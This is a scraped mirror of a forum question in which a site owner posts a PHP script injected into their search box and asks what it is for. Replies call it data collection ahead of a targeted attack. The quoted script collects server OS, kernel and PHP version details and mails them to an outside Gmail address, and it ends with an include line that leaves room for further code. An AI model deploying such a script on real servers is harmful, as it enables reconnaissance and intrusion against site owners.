Warning: file_get_contents(/data/phpspider/zhask/data//catemap/1/php/266.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Php 被黑客攻击_Php_Input_Code Injection - Fatal编程技术网

Php 被黑客攻击

Php 被黑客攻击,php,input,code-injection,Php,Input,Code Injection,我有一个使用LAMP服务器的网站。最近有人在我的搜索框里放了一个链接。我将在此处复制代码: <?php $OS = @PHP_OS; $UNAME = @php_uname(); $PHPv = @phpversion(); $SafeMode = @ini_get('safe_mode'); $hosts = $_SERVER["HTTP_HOST"]; if ($SafeMode == '') { $SafeMode = "<i>OFF</

我有一个使用LAMP服务器的网站。最近有人在我的搜索框里放了一个链接。我将在此处复制代码:

<?php
  $OS = @PHP_OS;
  $UNAME = @php_uname();
  $PHPv = @phpversion();
  $SafeMode = @ini_get('safe_mode');

  $hosts = $_SERVER["HTTP_HOST"];

  if ($SafeMode == '') { $SafeMode = "<i>OFF</i><BR>"; }
  else { $SafeMode = "<i>$SafeMode</i><BR>"; }


  $injek=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);

  $psn=("OS = " . $OS . "<BR>UNAME = " . $UNAME . "<BR>PHPVersion = " . $PHPv . "<BR>Safe Mode = " . $SafeMode . "<BR><font color=blue>http://" . $injek . "</font><BR>Ingat jangan pakai Injek Ini.<BR>");

  $header = $_SERVER["HTTP_HOST"];
  $header .= "MIME-Version: 1.0\r\n";
  If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
  If ($file_name) $header .= "--$uid\r\n";
  $header .= "Content-Type: text/$contenttype\r\n";
  $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
  $header .= "$message\r\n";
  If ($file_name) $header .= "--$uid\r\n";
  If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
  If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
  If ($file_name) $header .= "Content-Disposition: attachment; 

filename=\"$file_name\"\r\n\r\n";
  If ($file_name) $header .= "$content\r\n";
  If ($file_name) $header .= "--$uid--";
  $to = ("toyota.corola2016@gmail.com");
  $subject = ("$UNAME");
  mail($to,$subject,$psn,$header);

@include "$bn";

?>
  </table>
  </fieldset></form>
</div>
</body>

</html>


由于用户输入的安全系统,我的系统没有发生任何有害的事情。但我想知道黑客的目的。我使用PHP大约两年了。然而,我不明白这个脚本的目的。有人能帮忙吗?

看起来只是数据收集。收到该电子邮件的人可能会在稍后尝试更具针对性的攻击,并在此处发布“未发生任何有害事件”-除非有人能够在您的系统上运行任意代码。这本身就是有害的——您不能信任自己的服务器。找出漏洞在哪里,可能是从你的访问日志中。@halfer谁说代码曾经运行过?据我所知,输入清理在这里起到了作用,“有人在我的搜索框中添加了链接”的确切含义尚不清楚。